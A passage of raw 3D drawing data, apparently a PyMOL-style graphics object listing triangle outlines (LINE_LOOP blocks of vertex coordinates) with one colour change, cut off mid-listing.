VERTEX, 25.516, 35.733, 28.554,
VERTEX, 25.810, 35.842, 28.749,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.516, 35.733, 28.554,
VERTEX, 25.810, 35.842, 28.749,
VERTEX, 25.449, 35.514, 29.183,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.810, 35.842, 28.749,
VERTEX, 25.449, 35.514, 29.183,
VERTEX, 25.742, 35.607, 29.372,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.449, 35.514, 29.183,
VERTEX, 25.742, 35.607, 29.372,
VERTEX, 25.456, 35.029, 29.963,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.742, 35.607, 29.372,
VERTEX, 25.456, 35.029, 29.963,
VERTEX, 25.778, 35.119, 30.149,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.456, 35.029, 29.963,
VERTEX, 25.778, 35.119, 30.149,
VERTEX, 25.533, 34.563, 30.437,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.778, 35.119, 30.149,
VERTEX, 25.533, 34.563, 30.437,
VERTEX, 25.895, 34.663, 30.625,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.533, 34.563, 30.437,
VERTEX, 25.895, 34.663, 30.625,
VERTEX, 25.634, 34.389, 30.328,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.895, 34.663, 30.625,
VERTEX, 25.634, 34.389, 30.328,
VERTEX, 26.027, 34.506, 30.520,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.027, 34.506, 30.520,
VERTEX, 26.376, 34.657, 30.758,
VERTEX, 26.094, 34.741, 29.897,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.376, 34.657, 30.758,
VERTEX, 26.094, 34.741, 29.897,
VERTEX, 26.446, 34.909, 30.142,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.094, 34.741, 29.897,
VERTEX, 26.446, 34.909, 30.142,
VERTEX, 26.059, 35.229, 29.120,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.446, 34.909, 30.142,
VERTEX, 26.059, 35.229, 29.120,
VERTEX, 26.382, 35.396, 29.366,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.059, 35.229, 29.120,
VERTEX, 26.382, 35.396, 29.366,
VERTEX, 25.941, 35.685, 28.644,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.382, 35.396, 29.366,
VERTEX, 25.941, 35.685, 28.644,
VERTEX, 26.221, 35.834, 28.885,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.941, 35.685, 28.644,
VERTEX, 26.221, 35.834, 28.885,
VERTEX, 25.810, 35.842, 28.749,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.221, 35.834, 28.885,
VERTEX, 25.810, 35.842, 28.749,
VERTEX, 26.059, 35.965, 28.981,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.810, 35.842, 28.749,
VERTEX, 26.059, 35.965, 28.981,
VERTEX, 25.742, 35.607, 29.372,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.059, 35.965, 28.981,
VERTEX, 25.742, 35.607, 29.372,
VERTEX, 25.989, 35.713, 29.597,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.742, 35.607, 29.372,
VERTEX, 25.989, 35.713, 29.597,
VERTEX, 25.778, 35.119, 30.149,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.989, 35.713, 29.597,
VERTEX, 25.778, 35.119, 30.149,
VERTEX, 26.053, 35.225, 30.373,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.778, 35.119, 30.149,
VERTEX, 26.053, 35.225, 30.373,
VERTEX, 25.895, 34.663, 30.625,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.053, 35.225, 30.373,
VERTEX, 25.895, 34.663, 30.625,
VERTEX, 26.214, 34.788, 30.854,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.895, 34.663, 30.625,
VERTEX, 26.214, 34.788, 30.854,
VERTEX, 26.027, 34.506, 30.520,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.214, 34.788, 30.854,
VERTEX, 26.027, 34.506, 30.520,
VERTEX, 26.376, 34.657, 30.758,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.376, 34.657, 30.758,
VERTEX, 26.666, 34.833, 31.052,
VERTEX, 26.446, 34.909, 30.142,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.666, 34.833, 31.052,
VERTEX, 26.446, 34.909, 30.142,
VERTEX, 26.739, 35.108, 30.446,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.446, 34.909, 30.142,
VERTEX, 26.739, 35.108, 30.446,
VERTEX, 26.382, 35.396, 29.366,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.739, 35.108, 30.446,
VERTEX, 26.382, 35.396, 29.366,
VERTEX, 26.647, 35.591, 29.670,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.382, 35.396, 29.366,
VERTEX, 26.647, 35.591, 29.670,
VERTEX, 26.221, 35.834, 28.885,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.647, 35.591, 29.670,
VERTEX, 26.221, 35.834, 28.885,
VERTEX, 26.446, 35.998, 29.179,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.221, 35.834, 28.885,
VERTEX, 26.446, 35.998, 29.179,
VERTEX, 26.059, 35.965, 28.981,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.446, 35.998, 29.179,
VERTEX, 26.059, 35.965, 28.981,
VERTEX, 26.252, 36.091, 29.259,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.059, 35.965, 28.981,
VERTEX, 26.252, 36.091, 29.259,
VERTEX, 25.989, 35.713, 29.597,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.252, 36.091, 29.259,
VERTEX, 25.989, 35.713, 29.597,
VERTEX, 26.179, 35.815, 29.865,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.989, 35.713, 29.597,
VERTEX, 26.179, 35.815, 29.865,
VERTEX, 26.053, 35.225, 30.373,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.179, 35.815, 29.865,
VERTEX, 26.053, 35.225, 30.373,
VERTEX, 26.271, 35.333, 30.641,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.053, 35.225, 30.373,
VERTEX, 26.271, 35.333, 30.641,
VERTEX, 26.214, 34.788, 30.854,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.271, 35.333, 30.641,
VERTEX, 26.214, 34.788, 30.854,
VERTEX, 26.472, 34.926, 31.133,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.214, 34.788, 30.854,
VERTEX, 26.472, 34.926, 31.133,
VERTEX, 26.376, 34.657, 30.758,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.472, 34.926, 31.133,
VERTEX, 26.376, 34.657, 30.758,
VERTEX, 26.666, 34.833, 31.052,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.666, 34.833, 31.052,
VERTEX, 26.877, 35.021, 31.412,
VERTEX, 26.739, 35.108, 30.446,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.877, 35.021, 31.412,
VERTEX, 26.739, 35.108, 30.446,
VERTEX, 26.950, 35.327, 30.821,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.739, 35.108, 30.446,
VERTEX, 26.950, 35.327, 30.821,
VERTEX, 26.647, 35.591, 29.670,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.950, 35.327, 30.821,
VERTEX, 26.647, 35.591, 29.670,
VERTEX, 26.834, 35.802, 30.044,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.647, 35.591, 29.670,
VERTEX, 26.834, 35.802, 30.044,
VERTEX, 26.446, 35.998, 29.179,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.834, 35.802, 30.044,
VERTEX, 26.446, 35.998, 29.179,
VERTEX, 26.598, 36.168, 29.535,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.446, 35.998, 29.179,
VERTEX, 26.598, 36.168, 29.535,
VERTEX, 26.252, 36.091, 29.259,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.598, 36.168, 29.535,
VERTEX, 26.252, 36.091, 29.259,
VERTEX, 26.381, 36.211, 29.594,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.252, 36.091, 29.259,
VERTEX, 26.381, 36.211, 29.594,
VERTEX, 26.179, 35.815, 29.865,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.381, 36.211, 29.594,
VERTEX, 26.179, 35.815, 29.865,
VERTEX, 26.308, 35.905, 30.185,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.179, 35.815, 29.865,
VERTEX, 26.308, 35.905, 30.185,
VERTEX, 26.271, 35.333, 30.641,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.308, 35.905, 30.185,
VERTEX, 26.271, 35.333, 30.641,
VERTEX, 26.424, 35.430, 30.962,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.271, 35.333, 30.641,
VERTEX, 26.424, 35.430, 30.962,
VERTEX, 26.472, 34.926, 31.133,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.424, 35.430, 30.962,
VERTEX, 26.472, 34.926, 31.133,
VERTEX, 26.660, 35.064, 31.471,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.472, 34.926, 31.133,
VERTEX, 26.660, 35.064, 31.471,
VERTEX, 26.666, 34.833, 31.052,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.660, 35.064, 31.471,
VERTEX, 26.666, 34.833, 31.052,
VERTEX, 26.877, 35.021, 31.412,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.877, 35.021, 31.412,
VERTEX, 26.995, 35.245, 31.792,
VERTEX, 26.950, 35.327, 30.821,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.995, 35.245, 31.792,
VERTEX, 26.950, 35.327, 30.821,
VERTEX, 27.057, 35.578, 31.214,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.950, 35.327, 30.821,
VERTEX, 27.057, 35.578, 31.214,
VERTEX, 26.834, 35.802, 30.044,
END,
BEGIN, LINE_LOOP,
VERTEX, 27.057, 35.578, 31.214,
VERTEX, 26.834, 35.802, 30.044,
VERTEX, 26.919, 36.040, 30.433,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.834, 35.802, 30.044,
VERTEX, 26.919, 36.040, 30.433,
VERTEX, 26.598, 36.168, 29.535,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.919, 36.040, 30.433,
VERTEX, 26.598, 36.168, 29.535,
VERTEX, 26.661, 36.360, 29.905,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.598, 36.168, 29.535,
VERTEX, 26.661, 36.360, 29.905,
VERTEX, 26.381, 36.211, 29.594,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.661, 36.360, 29.905,
VERTEX, 26.381, 36.211, 29.594,
VERTEX, 26.434, 36.352, 29.940,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.381, 36.211, 29.594,
VERTEX, 26.434, 36.352, 29.940,
VERTEX, 26.308, 35.905, 30.185,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.434, 36.352, 29.940,
VERTEX, 26.308, 35.905, 30.185,
VERTEX, 26.372, 36.019, 30.517,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.308, 35.905, 30.185,
VERTEX, 26.372, 36.019, 30.517,
VERTEX, 26.424, 35.430, 30.962,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.372, 36.019, 30.517,
VERTEX, 26.424, 35.430, 30.962,
VERTEX, 26.510, 35.557, 31.299,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.424, 35.430, 30.962,
VERTEX, 26.510, 35.557, 31.299,
VERTEX, 26.660, 35.064, 31.471,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.510, 35.557, 31.299,
VERTEX, 26.660, 35.064, 31.471,
VERTEX, 26.768, 35.237, 31.827,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.660, 35.064, 31.471,
VERTEX, 26.768, 35.237, 31.827,
VERTEX, 26.877, 35.021, 31.412,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.768, 35.237, 31.827,
VERTEX, 26.877, 35.021, 31.412,
VERTEX, 26.995, 35.245, 31.792,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.995, 35.245, 31.792,
VERTEX, 27.025, 35.522, 32.141,
VERTEX, 27.057, 35.578, 31.214,
END,
BEGIN, LINE_LOOP,
VERTEX, 27.025, 35.522, 32.141,
VERTEX, 27.057, 35.578, 31.214,
VERTEX, 27.069, 35.869, 31.570,
END,
BEGIN, LINE_LOOP,
VERTEX, 27.057, 35.578, 31.214,
VERTEX, 27.069, 35.869, 31.570,
VERTEX, 26.919, 36.040, 30.433,
END,
BEGIN, LINE_LOOP,
VERTEX, 27.069, 35.869, 31.570,
VERTEX, 26.919, 36.040, 30.433,
VERTEX, 26.908, 36.310, 30.780,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.919, 36.040, 30.433,
VERTEX, 26.908, 36.310, 30.780,
VERTEX, 26.661, 36.360, 29.905,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.908, 36.310, 30.780,
VERTEX, 26.661, 36.360, 29.905,
VERTEX, 26.636, 36.585, 30.234,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.661, 36.360, 29.905,
VERTEX, 26.636, 36.585, 30.234,
VERTEX, 26.434, 36.352, 29.940,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.636, 36.585, 30.234,
VERTEX, 26.434, 36.352, 29.940,
VERTEX, 26.413, 36.534, 30.251,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.434, 36.352, 29.940,
VERTEX, 26.413, 36.534, 30.251,
VERTEX, 26.372, 36.019, 30.517,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.413, 36.534, 30.251,
VERTEX, 26.372, 36.019, 30.517,
VERTEX, 26.369, 36.187, 30.822,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.372, 36.019, 30.517,
VERTEX, 26.369, 36.187, 30.822,
VERTEX, 26.510, 35.557, 31.299,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.369, 36.187, 30.822,
VERTEX, 26.510, 35.557, 31.299,
VERTEX, 26.530, 35.747, 31.612,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.510, 35.557, 31.299,
VERTEX, 26.530, 35.747, 31.612,
VERTEX, 26.768, 35.237, 31.827,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.530, 35.747, 31.612,
VERTEX, 26.768, 35.237, 31.827,
VERTEX, 26.801, 35.472, 32.158,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.768, 35.237, 31.827,
VERTEX, 26.801, 35.472, 32.158,
VERTEX, 26.995, 35.245, 31.792,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.801, 35.472, 32.158,
VERTEX, 26.995, 35.245, 31.792,
VERTEX, 27.025, 35.522, 32.141,
END,
BEGIN, LINE_LOOP,
VERTEX, 27.025, 35.522, 32.141,
VERTEX, 26.977, 35.832, 32.463,
VERTEX, 27.069, 35.869, 31.570,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.977, 35.832, 32.463,
VERTEX, 27.069, 35.869, 31.570,
VERTEX, 26.999, 36.184, 31.894,
END,
BEGIN, LINE_LOOP,
VERTEX, 27.069, 35.869, 31.570,
VERTEX, 26.999, 36.184, 31.894,
VERTEX, 26.908, 36.310, 30.780,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.999, 36.184, 31.894,
VERTEX, 26.908, 36.310, 30.780,
VERTEX, 26.817, 36.596, 31.093,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.908, 36.310, 30.780,
VERTEX, 26.817, 36.596, 31.093,
VERTEX, 26.636, 36.585, 30.234,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.817, 36.596, 31.093,
VERTEX, 26.636, 36.585, 30.234,
VERTEX, 26.537, 36.827, 30.531,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.636, 36.585, 30.234,
VERTEX, 26.537, 36.827, 30.531,
VERTEX, 26.413, 36.534, 30.251,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.537, 36.827, 30.531,
VERTEX, 26.413, 36.534, 30.251,
VERTEX, 26.324, 36.742, 30.536,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.413, 36.534, 30.251,
VERTEX, 26.324, 36.742, 30.536,
VERTEX, 26.369, 36.187, 30.822,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.324, 36.742, 30.536,
VERTEX, 26.369, 36.187, 30.822,
VERTEX, 26.302, 36.391, 31.105,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.369, 36.187, 30.822,
VERTEX, 26.302, 36.391, 31.105,
VERTEX, 26.530, 35.747, 31.612,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.302, 36.391, 31.105,
VERTEX, 26.530, 35.747, 31.612,
VERTEX, 26.484, 35.979, 31.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.530, 35.747, 31.612,
VERTEX, 26.484, 35.979, 31.906,
VERTEX, 26.801, 35.472, 32.158,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.484, 35.979, 31.906,
VERTEX, 26.801, 35.472, 32.158,
VERTEX, 26.764, 35.747, 32.468,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.801, 35.472, 32.158,
VERTEX, 26.764, 35.747, 32.468,
VERTEX, 27.025, 35.522, 32.141,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.764, 35.747, 32.468,
VERTEX, 27.025, 35.522, 32.141,
VERTEX, 26.977, 35.832, 32.463,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.977, 35.832, 32.463,
VERTEX, 26.863, 36.156, 32.764,
VERTEX, 26.999, 36.184, 31.894,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.863, 36.156, 32.764,
VERTEX, 26.999, 36.184, 31.894,
VERTEX, 26.862, 36.504, 32.192,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.999, 36.184, 31.894,
VERTEX, 26.862, 36.504, 32.192,
VERTEX, 26.817, 36.596, 31.093,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.862, 36.504, 32.192,
VERTEX, 26.817, 36.596, 31.093,
VERTEX, 26.661, 36.884, 31.380,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.817, 36.596, 31.093,
VERTEX, 26.661, 36.884, 31.380,
VERTEX, 26.537, 36.827, 30.531,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.661, 36.884, 31.380,
VERTEX, 26.537, 36.827, 30.531,
VERTEX, 26.378, 37.072, 30.804,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.537, 36.827, 30.531,
VERTEX, 26.378, 37.072, 30.804,
VERTEX, 26.324, 36.742, 30.536,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.378, 37.072, 30.804,
VERTEX, 26.324, 36.742, 30.536,
VERTEX, 26.178, 36.958, 30.800,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.324, 36.742, 30.536,
VERTEX, 26.178, 36.958, 30.800,
VERTEX, 26.302, 36.391, 31.105,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.178, 36.958, 30.800,
VERTEX, 26.302, 36.391, 31.105,
VERTEX, 26.179, 36.610, 31.372,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.302, 36.391, 31.105,
VERTEX, 26.179, 36.610, 31.372,
VERTEX, 26.484, 35.979, 31.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.179, 36.610, 31.372,
VERTEX, 26.484, 35.979, 31.906,
VERTEX, 26.380, 36.230, 32.184,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.484, 35.979, 31.906,
VERTEX, 26.380, 36.230, 32.184,
VERTEX, 26.764, 35.747, 32.468,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.380, 36.230, 32.184,
VERTEX, 26.764, 35.747, 32.468,
VERTEX, 26.663, 36.042, 32.760,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.764, 35.747, 32.468,
VERTEX, 26.663, 36.042, 32.760,
VERTEX, 26.977, 35.832, 32.463,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.663, 36.042, 32.760,
VERTEX, 26.977, 35.832, 32.463,
VERTEX, 26.863, 36.156, 32.764,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.863, 36.156, 32.764,
VERTEX, 26.689, 36.472, 33.048,
VERTEX, 26.862, 36.504, 32.192,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.689, 36.472, 33.048,
VERTEX, 26.862, 36.504, 32.192,
VERTEX, 26.666, 36.814, 32.473,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.862, 36.504, 32.192,
VERTEX, 26.666, 36.814, 32.473,
VERTEX, 26.661, 36.884, 31.380,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.666, 36.814, 32.473,
VERTEX, 26.661, 36.884, 31.380,
VERTEX, 26.450, 37.159, 31.650,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.661, 36.884, 31.380,
VERTEX, 26.450, 37.159, 31.650,
VERTEX, 26.378, 37.072, 30.804,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.450, 37.159, 31.650,
VERTEX, 26.378, 37.072, 30.804,
VERTEX, 26.169, 37.304, 31.060,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.378, 37.072, 30.804,
VERTEX, 26.169, 37.304, 31.060,
VERTEX, 26.178, 36.958, 30.800,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.169, 37.304, 31.060,
VERTEX, 26.178, 36.958, 30.800,
VERTEX, 25.986, 37.165, 31.050,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.178, 36.958, 30.800,
VERTEX, 25.986, 37.165, 31.050,
VERTEX, 26.179, 36.610, 31.372,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.986, 37.165, 31.050,
VERTEX, 26.179, 36.610, 31.372,
VERTEX, 26.010, 36.823, 31.625,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.179, 36.610, 31.372,
VERTEX, 26.010, 36.823, 31.625,
VERTEX, 26.380, 36.230, 32.184,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.010, 36.823, 31.625,
VERTEX, 26.380, 36.230, 32.184,
VERTEX, 26.225, 36.479, 32.448,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.380, 36.230, 32.184,
VERTEX, 26.225, 36.479, 32.448,
VERTEX, 26.663, 36.042, 32.760,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.225, 36.479, 32.448,
VERTEX, 26.663, 36.042, 32.760,
VERTEX, 26.507, 36.333, 33.038,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.663, 36.042, 32.760,
VERTEX, 26.507, 36.333, 33.038,
VERTEX, 26.863, 36.156, 32.764,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.507, 36.333, 33.038,
VERTEX, 26.863, 36.156, 32.764,
VERTEX, 26.689, 36.472, 33.048,
END,
COLOR, 0.000, 1.000, 0.992,
BEGIN, LINE_LOOP,
VERTEX, 26.689, 36.472, 33.048,
VERTEX, 26.464, 36.761, 33.323,
VERTEX, 26.666, 36.814, 32.473,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.464, 36.761, 33.323,
VERTEX, 26.666, 36.814, 32.473,
VERTEX, 26.419, 37.096, 32.745,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.666, 36.814, 32.473,
VERTEX, 26.419, 37.096, 32.745,
VERTEX, 26.450, 37.159, 31.650,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.419, 37.096, 32.745,
VERTEX, 26.450, 37.159, 31.650,
VERTEX, 26.194, 37.406, 31.910,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.450, 37.159, 31.650,
VERTEX, 26.194, 37.406, 31.910,
VERTEX, 26.169, 37.304, 31.060,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.194, 37.406, 31.910,
VERTEX, 26.169, 37.304, 31.060,
VERTEX, 25.921, 37.510, 31.308,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.169, 37.304, 31.060,
VERTEX, 25.921, 37.510, 31.308,
VERTEX, 25.986, 37.165, 31.050,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.921, 37.510, 31.308,
VERTEX, 25.986, 37.165, 31.050,
VERTEX, 25.760, 37.347, 31.291,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.986, 37.165, 31.050,
VERTEX, 25.760, 37.347, 31.291,
VERTEX, 26.010, 36.823, 31.625,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.760, 37.347, 31.291,
VERTEX, 26.010, 36.823, 31.625,
VERTEX, 25.805, 37.013, 31.869,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.010, 36.823, 31.625,
VERTEX, 25.805, 37.013, 31.869,
VERTEX, 26.225, 36.479, 32.448,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.805, 37.013, 31.869,
VERTEX, 26.225, 36.479, 32.448,
VERTEX, 26.030, 36.703, 32.704,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.225, 36.479, 32.448,
VERTEX, 26.030, 36.703, 32.704,
VERTEX, 26.507, 36.333, 33.038,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.030, 36.703, 32.704,
VERTEX, 26.507, 36.333, 33.038,
VERTEX, 26.303, 36.599, 33.306,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.507, 36.333, 33.038,
VERTEX, 26.303, 36.599, 33.306,
VERTEX, 26.689, 36.472, 33.048,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.303, 36.599, 33.306,
VERTEX, 26.689, 36.472, 33.048,
VERTEX, 26.464, 36.761, 33.323,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.464, 36.761, 33.323,
VERTEX, 26.195, 37.003, 33.594,
VERTEX, 26.419, 37.096, 32.745,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.195, 37.003, 33.594,
VERTEX, 26.419, 37.096, 32.745,
VERTEX, 26.128, 37.330, 33.014,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.419, 37.096, 32.745,
VERTEX, 26.128, 37.330, 33.014,
VERTEX, 26.194, 37.406, 31.910,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.128, 37.330, 33.014,
VERTEX, 26.194, 37.406, 31.910,
VERTEX, 25.900, 37.608, 32.169,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.194, 37.406, 31.910,
VERTEX, 25.900, 37.608, 32.169,
VERTEX, 25.921, 37.510, 31.308,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.900, 37.608, 32.169,
VERTEX, 25.921, 37.510, 31.308,
VERTEX, 25.644, 37.673, 31.553,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.921, 37.510, 31.308,
VERTEX, 25.644, 37.673, 31.553,
VERTEX, 25.760, 37.347, 31.291,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.644, 37.673, 31.553,
VERTEX, 25.760, 37.347, 31.291,
VERTEX, 25.512, 37.487, 31.528,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.760, 37.347, 31.291,
VERTEX, 25.512, 37.487, 31.528,
VERTEX, 25.805, 37.013, 31.869,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.512, 37.487, 31.528,
VERTEX, 25.805, 37.013, 31.869,
VERTEX, 25.579, 37.160, 32.108,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.805, 37.013, 31.869,
VERTEX, 25.579, 37.160, 32.108,
VERTEX, 26.030, 36.703, 32.704,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.579, 37.160, 32.108,
VERTEX, 26.030, 36.703, 32.704,
VERTEX, 25.807, 36.882, 32.953,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.030, 36.703, 32.704,
VERTEX, 25.807, 36.882, 32.953,
VERTEX, 26.303, 36.599, 33.306,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.807, 36.882, 32.953,
VERTEX, 26.303, 36.599, 33.306,
VERTEX, 26.062, 36.817, 33.568,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.303, 36.599, 33.306,
VERTEX, 26.062, 36.817, 33.568,
VERTEX, 26.464, 36.761, 33.323,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.062, 36.817, 33.568,
VERTEX, 26.464, 36.761, 33.323,
VERTEX, 26.195, 37.003, 33.594,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.195, 37.003, 33.594,
VERTEX, 25.889, 37.174, 33.866,
VERTEX, 26.128, 37.330, 33.014,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.889, 37.174, 33.866,
VERTEX, 26.128, 37.330, 33.014,
VERTEX, 25.797, 37.497, 33.287,
END,
BEGIN, LINE_LOOP,
VERTEX, 26.128, 37.330, 33.014,
VERTEX, 25.797, 37.497, 33.287,
VERTEX, 25.900, 37.608, 32.169,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.797, 37.497, 33.287,
VERTEX, 25.900, 37.608, 32.169,
VERTEX, 25.573, 37.747, 32.432,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.900, 37.608, 32.169,
VERTEX, 25.573, 37.747, 32.432,
VERTEX, 25.644, 37.673, 31.553,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.573, 37.747, 32.432,
VERTEX, 25.644, 37.673, 31.553,
VERTEX, 25.348, 37.778, 31.803,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.644, 37.673, 31.553,
VERTEX, 25.348, 37.778, 31.803,
VERTEX, 25.512, 37.487, 31.528,
END,
BEGIN, LINE_LOOP,
VERTEX, 25.348, 37.778, 31.803,
